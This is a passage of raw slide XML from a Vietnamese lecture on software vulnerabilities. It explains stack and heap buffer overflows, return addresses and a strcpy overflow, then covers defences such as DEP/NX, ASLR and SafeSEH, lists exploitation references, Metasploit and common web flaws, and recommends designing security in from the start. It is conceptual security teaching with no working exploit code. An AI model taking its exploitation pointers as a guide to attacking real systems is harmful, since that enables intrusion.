            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Dễ tránh nhưng phổ biến và nguy hiểm nhất hiện nay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Đứng thứ 3/25 trong bảng xếp hạng lỗi lập trình nguy hiểm nhất của SANS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Hai dạng lớn: trên stack, trên heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Có nhiều cơ chế bảo vệ và cũng có nhiều kỹ thuật khai thác</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26674640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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>ràn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>bộ đệm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37</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 41" descr="Description: D:\Thuc tap va do an\Hinh\over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7239000" cy="546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67835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itchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Hai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>dạng tràn bộ đệm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tràn bộ đệm trên Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: biến cục bộ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tràn bộ đệm trên Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: cấp phát </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>ràn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>bộ đệm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38</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17228050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Stack</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39</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179526" y="1143000"/>
            <a:ext cx="8735874" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25920006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205133628"/>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1159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Gọi hàm và trở về từ hàm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E15BD7C-E074-4D4A-84C3-500EE5B9C190}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5334000"/>
            <a:ext cx="8380040" cy="129540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600" b="1" dirty="0" smtClean="0"/>
              <a:t>Địa chỉ trở về (return address) được lưu trong stack của chương trình (hoặc luồng)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147320" y="761836"/>
            <a:ext cx="8882839" cy="4572164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39277963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Gọi hàm và trở về từ hàm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E15BD7C-E074-4D4A-84C3-500EE5B9C190}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152399" y="853440"/>
            <a:ext cx="8879705" cy="5775960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1964312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Tràn bộ đệm với strcpy(arr, s1)</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="685800"/>
            <a:ext cx="8686800" cy="6177564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16447948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b="1" dirty="0" smtClean="0"/>
              <a:t>Chống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>khai thác </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>(1/2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Lỗ hổng tràn bộ đệm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43</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 15" descr="Description: D:\Thuc tap va do an\Image D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514600"/>
            <a:ext cx="7772400" cy="35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130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itchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Chống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>khai thác </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>(2/2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/NX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t> (Data Execution Prevention)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>SLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>– Address Space Layout Randomization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>SafeSEH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Lỗ hổng tràn bộ đệm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44</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21791097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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploit Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>://www.exploit-db.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Nguyễn Thành Nam, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Kỹ thuật tận dụng lỗi phần mềm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, NXB KH&amp;KT, 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Jon Erickson, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Hacking: The Art of Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Starch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hoglund et al.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploiting Software How to Break Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, Addison Wesley </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tài liệu về lỗ hổng phần mềm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45</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33850660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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Massimiliano Tomassoli, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0"/>
              <a:t>Modern Windows Exploit Development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>James C. Foster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Buffer Overflow Attacks: Detect, Exploit, Prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, Syngress 200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>James </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C. Foster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Writing Security Tools and Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>, Syngress 2006 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="466725" indent="-466725">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Koziol et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Shellcoder's Handbook: Discovering and Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Security Holes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Wiley 2004</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tài liệu về lỗ hổng phần mềm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46</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25299212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vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>://www.metasploit.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Metasploitable Version 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r-7.co/Metasploitable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Frameworks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47</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Kết quả hình ảnh cho Metasplo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048000"/>
            <a:ext cx="6019800" cy="3545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2460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lgn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BÁO CÁO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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4974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817544977"/>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849059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Lỗ hổng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>ứng dụng web</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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Điển hình: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>SQL Injection, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Khác:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Path Traveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Xác thực yếu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Không có cơ chế chống spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21427612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 toàn phần mềm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50</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="570922654"/>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57892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anose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Các cơ chế an toàn cần phải được đưa vào ngay từ giai đoạn thiết kế</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bên sử dụng (bên đặt hàng) có thể tham gia, phê chuẩn thiết kế</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ví dụ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
